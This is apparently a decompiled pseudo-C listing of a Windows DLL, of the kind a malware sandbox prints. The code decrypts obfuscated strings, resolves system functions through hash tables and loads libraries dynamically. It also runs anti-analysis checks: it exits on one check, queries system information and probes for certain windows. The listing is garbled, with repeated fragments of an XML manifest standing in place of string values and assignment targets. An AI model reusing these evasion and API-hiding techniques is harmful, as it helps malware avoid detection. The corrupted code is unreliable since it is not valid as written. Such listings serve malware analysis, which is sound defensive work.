                                                                                                                        									M6F340550 = E6F331D50(0x7725be, _t601);
                                                                                                                        									M6F340554 = E6F331D50(0x7725bc, _t601);
                                                                                                                        									M6F340574 = E6F331D50(0x7b701c, _t601);
                                                                                                                        									M6F340578 = E6F331D50(0x7a2d08, _t601);
                                                                                                                        									M6F34057C = E6F331D50(0x7b70d8, _t601);
                                                                                                                        									M6F340558 = E6F331D50(0x7a304c, _t601);
                                                                                                                        									M6F34055C = E6F331D50(0x749a58, _t601);
                                                                                                                        									M6F340560 = E6F331D50(0x74b970, _t601);
                                                                                                                        									"voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = E6F331D50(0x7b0408, _t601);
                                                                                                                        									M6F340568 = E6F331D50(0x77ec48, _t601);
                                                                                                                        									M6F34056C = E6F331D50(0x74cddc, _t601);
                                                                                                                        									_t390 = E6F33A2F0(E6F331D50(0x7b4550, _t601), 0, 0);
                                                                                                                        									M6F3404DC = _t390;
                                                                                                                        									M6F3404E0 = lstrlenA(_t390);
                                                                                                                        									M6F340584 = E6F331D50(0x77a5b8, _t601);
                                                                                                                        									M6F3404D8 = E6F33A2F0(E6F331D50(0x7ad0d4, _t601), 0, 0);
                                                                                                                        									M6F3404D4 = E6F33A2F0(E6F331D50(0x7adf00, _t601), 0, 0);
                                                                                                                        									M6F340588 = E6F331D50(0x772a50, _t601);
                                                                                                                        									 *0x6f34047c = E6F33A2F0(E6F331D50(0x772af0, _t601), 0, 0);
                                                                                                                        									_t400 = GetCommandLineA();
                                                                                                                        									_t508 =  &_v868;
                                                                                                                        									_v868 = 0;
                                                                                                                        									_t605 = E6F33A3D0(_t400,  &_v868);
                                                                                                                        									_t618 = _t613 + 0xdc;
                                                                                                                        									if(_t605 != 0) {
                                                                                                                        										CharLowerA( *_t605);
                                                                                                                        										_t575 = _v868;
                                                                                                                        										if(_t575 > 1) {
                                                                                                                        											_t596 = 1;
                                                                                                                        											do {
                                                                                                                        												if(_t596 >= _t575 - 1) {
                                                                                                                        													L34:
                                                                                                                        													_t476 =  *((intOrPtr*)(_t605 + _t596 * 4));
                                                                                                                        													_t508 =  *_t476;
                                                                                                                        													__eflags = _t508 - 0x6b;
                                                                                                                        													if(_t508 != 0x6b) {
                                                                                                                        														L37:
                                                                                                                        														__eflags = _t508 - 0x66;
                                                                                                                        														if(_t508 == 0x66) {
                                                                                                                        															__eflags =  *(_t476 + 1);
                                                                                                                        															if( *(_t476 + 1) == 0) {
                                                                                                                        																M6F3404B8 = 1;
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        													} else {
                                                                                                                        														__eflags =  *(_t476 + 1);
                                                                                                                        														if( *(_t476 + 1) != 0) {
                                                                                                                        															goto L37;
                                                                                                                        														} else {
                                                                                                                        															M6F3404B4 = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													_t477 =  *((intOrPtr*)(_t605 + _t596 * 4));
                                                                                                                        													if( *_t477 != 0x77 ||  *((intOrPtr*)(_t477 + 1)) != 0) {
                                                                                                                        														goto L34;
                                                                                                                        													} else {
                                                                                                                        														_t508 =  *(_t605 + 4 + _t596 * 4);
                                                                                                                        														_t596 = _t596 + 1;
                                                                                                                        														_t478 = StrToIntA(_t508);
                                                                                                                        														_t575 = _v868;
                                                                                                                        														M6F340514 = _t478;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												_t596 = _t596 + 1;
                                                                                                                        											} while (_t596 < _t575);
                                                                                                                        										}
                                                                                                                        										LocalFree(_t605);
                                                                                                                        									}
                                                                                                                        									_push(8);
                                                                                                                        									_push(0x6f340398);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_t548 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        									E6F332140(_t508, _t548, 1);
                                                                                                                        									_t403 = M6F3404F0; // 0xa54ab0
                                                                                                                        									_t509 = M6F340500; // 0xa45a70
                                                                                                                        									_t549 = M6F3404F4; // 0xa55c48
                                                                                                                        									_t404 = E6F333180(_t549, _t509, _t403);
                                                                                                                        									_t511 = M6F3404F0; // 0xa54ab0
                                                                                                                        									_v972 = 0x6467;
                                                                                                                        									_v970 = 0;
                                                                                                                        									M6F3404E4 = _t404 % 0x7fffffff;
                                                                                                                        									_t552 = M6F3404CC; // 0xa32d38
                                                                                                                        									_t407 = GetPrivateProfileIntA(_t511,  &_v972, 0, _t552);
                                                                                                                        									_t553 = M6F340524; // 0xa56118
                                                                                                                        									M6F3404BC = _t407; // executed
                                                                                                                        									_t408 = GetModuleHandleA(_t553); // executed
                                                                                                                        									"embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t408;
                                                                                                                        									_t410 = GetModuleHandleA(E6F331D50(0x77146c, _t601));
                                                                                                                        									_push(0x435a88);
                                                                                                                        									_t606 = _t410;
                                                                                                                        									_push(1);
                                                                                                                        									_push( &_v968);
                                                                                                                        									_push(_t606);
                                                                                                                        									_v968 = 0x3f82e705;
                                                                                                                        									_v964 = 0;
                                                                                                                        									_v960 = 0;
                                                                                                                        									_v956 = 0;
                                                                                                                        									E6F331DB0();
                                                                                                                        									_t413 = _v956;
                                                                                                                        									_t621 = _t618 + 0x2c;
                                                                                                                        									if(_t413 != 0) {
                                                                                                                        										M6F34058C = _t413;
                                                                                                                        									}
                                                                                                                        									_t415 = E6F33A2F0(E6F331D50(0x77d760, _t601), 0, 0);
                                                                                                                        									_t512 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									_t589 = _t415;
                                                                                                                        									wsprintfA( &_v576, "%s%s", _t512, _t589);
                                                                                                                        									_t622 = _t621 + 0x24;
                                                                                                                        									HeapFree(GetProcessHeap(), 0, _t589);
                                                                                                                        									_t420 = LoadLibraryA( &_v568); // executed
                                                                                                                        									M6F3404A8 = _t420;
                                                                                                                        									if(E6F33B4C0() != 0) {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        									_push(8);
                                                                                                                        									_push( &_v852);
                                                                                                                        									M6F340614 = 1;
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_v860 = 8;
                                                                                                                        									_v872 = 0;
                                                                                                                        									_t423 = NtQuerySystemInformation(0x67,  &_v860, 8,  &_v872); // executed
                                                                                                                        									if(_t423 < 0 || _v888 != 8 || (_v872 & 0x00000002) == 0) {
                                                                                                                        										_t591 = 0;
                                                                                                                        									} else {
                                                                                                                        										_t591 = 1;
                                                                                                                        										_v992 = 1;
                                                                                                                        									}
                                                                                                                        									if(_t606 != 0) {
                                                                                                                        										_push(0x435a88);
                                                                                                                        										_push(1);
                                                                                                                        										_push( &_v984);
                                                                                                                        										_push(_t606);
                                                                                                                        										_v984 = 0x2e136e83;
                                                                                                                        										_v980 = 0;
                                                                                                                        										_v976 = 0;
                                                                                                                        										_v972 = 0;
                                                                                                                        										E6F331DB0();
                                                                                                                        										_t470 = _v972;
                                                                                                                        										_t632 = _t622 + 0x10;
                                                                                                                        										if(_t470 != 0) {
                                                                                                                        											"Level>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t470;
                                                                                                                        										}
                                                                                                                        										_t96 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v984 = 0xa1acb3a1;
                                                                                                                        										_v980 = E6F337C40;
                                                                                                                        										_v976 =  &M6F3405A4;
                                                                                                                        										_v972 = 0;
                                                                                                                        										_v968 = 0xd9ef7edb;
                                                                                                                        										_v964 = E6F3378B0;
                                                                                                                        										_v960 =  &M6F340594;
                                                                                                                        										_v956 = 0;
                                                                                                                        										_v952 = 0x75da5974;
                                                                                                                        										_v948 = E6F337C20;
                                                                                                                        										_v944 =  &M6F3405A0;
                                                                                                                        										_v940 = 0;
                                                                                                                        										_v936 = 0x2a081f08;
                                                                                                                        										_v932 = E6F338230;
                                                                                                                        										_v928 =  &M6F3405F8;
                                                                                                                        										_v924 = 0;
                                                                                                                        										_v920 = 0x71e40fdf;
                                                                                                                        										_v916 = E6F3382C0;
                                                                                                                        										_v912 =  &M6F3405FC;
                                                                                                                        										_v908 = 0;
                                                                                                                        										E6F331FA0(_t606,  &_v984, 5, _t96);
                                                                                                                        										_t622 = _t632 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t424 = E6F331D50(0x771704, _t601);
                                                                                                                        									_t514 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									wsprintfA( &_v592, "%s%s", _t514, _t424);
                                                                                                                        									_t623 = _t622 + 0x18;
                                                                                                                        									_t427 = LoadLibraryA( &_v584);
                                                                                                                        									M6F340490 = _t427;
                                                                                                                        									if(_t427 != 0) {
                                                                                                                        										_v856 = 0x1ee4afd;
                                                                                                                        										_v852 = E6F337F10;
                                                                                                                        										_v848 =  &M6F3405E8;
                                                                                                                        										_v844 = 0;
                                                                                                                        										_v840 = 0xcd967670;
                                                                                                                        										_v836 = E6F3380B0;
                                                                                                                        										_v832 =  &M6F3405EC;
                                                                                                                        										_v828 = 0;
                                                                                                                        										_v824 = 0xc640750c;
                                                                                                                        										_v820 = E6F338100;
                                                                                                                        										_v816 =  &M6F3405F0;
                                                                                                                        										_v812 = 0;
                                                                                                                        										_v808 = 0x856c5686;
                                                                                                                        										_v804 = E6F337E20;
                                                                                                                        										_v800 =  &M6F3405C0;
                                                                                                                        										_v796 = 0;
                                                                                                                        										_v792 = 0xd576e7bf;
                                                                                                                        										_v788 = E6F337E50;
                                                                                                                        										_v784 =  &M6F3405C4;
                                                                                                                        										_v780 = 0;
                                                                                                                        										_v776 = 0x4bdf2df3;
                                                                                                                        										_v772 = E6F337EC0;
                                                                                                                        										_v768 =  &M6F3405B8;
                                                                                                                        										_v764 = 0;
                                                                                                                        										_v760 = 0x25955ea4;
                                                                                                                        										_v756 = E6F337EE0;
                                                                                                                        										_v752 =  &M6F3405E0;
                                                                                                                        										_v748 = 0;
                                                                                                                        										_v744 = 0x576e0706;
                                                                                                                        										_v740 = E6F337E00;
                                                                                                                        										_v736 =  &M6F3405B0;
                                                                                                                        										_v732 = 0;
                                                                                                                        										_v728 = 0xa3bab257;
                                                                                                                        										_v724 = E6F337E00;
                                                                                                                        										_v720 =  &M6F3405B4;
                                                                                                                        										_v716 = 0;
                                                                                                                        										_v712 = 0xeb950520;
                                                                                                                        										_v708 = E6F337EF0;
                                                                                                                        										_v704 =  &M6F3405E4;
                                                                                                                        										_v700 = 0;
                                                                                                                        										_v696 = 0x983d21d0;
                                                                                                                        										_v692 = E6F337E90;
                                                                                                                        										_v688 =  &M6F3405C8;
                                                                                                                        										_v684 = 0;
                                                                                                                        										_v680 = 0xbd4f6953;
                                                                                                                        										_v676 = E6F337EA0;
                                                                                                                        										_v672 =  &M6F3405CC;
                                                                                                                        										_v668 = 0;
                                                                                                                        										_v664 = 0xc1059600;
                                                                                                                        										_v660 = E6F337EF0;
                                                                                                                        										_v656 =  &M6F3405BC;
                                                                                                                        										_v652 = 0;
                                                                                                                        										_v648 = 0x92d6cfa1;
                                                                                                                        										_v644 = E6F337EB0;
                                                                                                                        										_v640 =  &M6F3405D0;
                                                                                                                        										_v636 = 0;
                                                                                                                        										_v632 = 0xa710b547;
                                                                                                                        										_v628 = E6F337EF0;
                                                                                                                        										_v624 =  &M6F3405D4;
                                                                                                                        										_v620 = 0;
                                                                                                                        										_v616 = 0x35fe64ad;
                                                                                                                        										_v612 = E6F337DB0;
                                                                                                                        										_v608 =  &M6F3405A8;
                                                                                                                        										_v604 = 0;
                                                                                                                        										_v600 = 0x508fafbc;
                                                                                                                        										_v596 = E6F337DE0;
                                                                                                                        										_v592 =  &M6F3405AC;
                                                                                                                        										_v588 = 0;
                                                                                                                        										E6F331FA0(_t427,  &_v856, 0x11, _t591 + 0x435a88);
                                                                                                                        										_t568 = M6F340578; // 0x798f80
                                                                                                                        										_t189 = _t568 + 9; // 0x6854706f
                                                                                                                        										_v976 =  *_t189;
                                                                                                                        										_t463 = M6F340568; // 0x74cec0
                                                                                                                        										_t191 = _t463 + 0x1e; // 0x65006c
                                                                                                                        										_t623 = _t623 + 0x10;
                                                                                                                        										_v974 =  *_t191 & 0x0000ffff;
                                                                                                                        										_t193 = _t463 + 0x1e; // 0x65006c
                                                                                                                        										_t464 = M6F340574; // 0x784294
                                                                                                                        										_v972 =  *_t193 & 0x0000ffff;
                                                                                                                        										_t195 = _t464 + 1; // 0x61476e79
                                                                                                                        										_v970 =  *_t195;
                                                                                                                        										_v966 = 0x62;
                                                                                                                        										_v968 =  *_t464;
                                                                                                                        										_t199 = _t464 + 3; // 0x65746147
                                                                                                                        										_v964 =  *_t199;
                                                                                                                        										_v962 = 0;
                                                                                                                        										_t466 = FindWindowW( &_v976, 0); // executed
                                                                                                                        										_v964 = 0;
                                                                                                                        										_t468 = FindWindowW( &_v976, 0); // executed
                                                                                                                        										_t591 = _t466 + _t468;
                                                                                                                        										_v984 = _t591;
                                                                                                                        									}
                                                                                                                        									_t428 = E6F331D50(0x770adc, _t601);
                                                                                                                        									_t515 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									wsprintfA( &_v584, "%s%s", _t515, _t428);
                                                                                                                        									_t624 = _t623 + 0x18;
                                                                                                                        									_t431 = LoadLibraryA( &_v576);
                                                                                                                        									M6F340494 = _t431;
                                                                                                                        									if(_t431 != 0) {
                                                                                                                        										_t208 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v968 = 0x1febfb51;
                                                                                                                        										_v964 = E6F337ED0;
                                                                                                                        										_v960 =  &M6F3405DC;
                                                                                                                        										_v956 = 0;
                                                                                                                        										_v952 = 0xa4bc5079;
                                                                                                                        										_v948 = E6F337EC0;
                                                                                                                        										_v944 =  &M6F3405D8;
                                                                                                                        										_v940 = 0;
                                                                                                                        										_v936 = 0x3fca0603;
                                                                                                                        										_v932 = E6F3383A0;
                                                                                                                        										_v928 =  &M6F340608;
                                                                                                                        										_v924 = 0;
                                                                                                                        										_v920 = 0x5fa6686b;
                                                                                                                        										_v916 = E6F3383D0;
                                                                                                                        										_v912 =  &M6F34060C;
                                                                                                                        										_v908 = 0;
                                                                                                                        										E6F331FA0(_t431,  &_v968, 4, _t208);
                                                                                                                        										_t624 = _t624 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t432 = E6F331D50(0x7715e4, _t601);
                                                                                                                        									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									wsprintfA( &_v576, "%s%s", _t433, _t432);
                                                                                                                        									_t625 = _t624 + 0x18;
                                                                                                                        									_t435 = LoadLibraryA( &_v568);
                                                                                                                        									M6F340498 = _t435;
                                                                                                                        									if(_t435 != 0) {
                                                                                                                        										_t228 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v960 = 0xa0428c41;
                                                                                                                        										_v956 = E6F337B70;
                                                                                                                        										_v952 =  &M6F340598;
                                                                                                                        										_v948 = 0;
                                                                                                                        										_v944 = 0x35ad950a;
                                                                                                                        										_v940 = E6F337BD0;
                                                                                                                        										_v936 =  &M6F34059C;
                                                                                                                        										_v932 = 0;
                                                                                                                        										E6F331FA0(_t435,  &_v960, 2, _t228);
                                                                                                                        										_t625 = _t625 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t436 = E6F331D50(0x350b4, _t601);
                                                                                                                        									_t437 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									wsprintfA( &_v568, "%s%s", _t437, _t436);
                                                                                                                        									_t626 = _t625 + 0x18;
                                                                                                                        									_t439 = LoadLibraryA( &_v560);
                                                                                                                        									M6F34049C = _t439;
                                                                                                                        									if(_t439 != 0) {
                                                                                                                        										_v952 = 0x32e7e368;
                                                                                                                        										_v948 = E6F3382F0;
                                                                                                                        										_v944 =  &M6F340600;
                                                                                                                        										_v940 = 0;
                                                                                                                        										E6F331FA0(_t439,  &_v952, 1, _t591 + 0x435a88);
                                                                                                                        										_t626 = _t626 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t441 = E6F33A2F0(E6F331D50(0x77cf0c, _t601), 0, 0);
                                                                                                                        									_t560 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									_t592 = _t441;
                                                                                                                        									wsprintfA( &_v560, "%s%s", _t560, _t592);
                                                                                                                        									_t627 = _t626 + 0x24;
                                                                                                                        									HeapFree(GetProcessHeap(), 0, _t592);
                                                                                                                        									_t446 = LoadLibraryA( &_v552); // executed
                                                                                                                        									M6F3404A0 = _t446;
                                                                                                                        									if(_t446 != 0) {
                                                                                                                        										_v944 = 0xa4a1b443;
                                                                                                                        										_v940 = E6F337EE0;
                                                                                                                        										_v936 =  &M6F3405F4;
                                                                                                                        										_v932 = 0;
                                                                                                                        										E6F331FA0(_t446,  &_v944, 1, _v952 + 0x435a88);
                                                                                                                        										_t627 = _t627 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t447 = E6F331D50(0x37b4c, _t601);
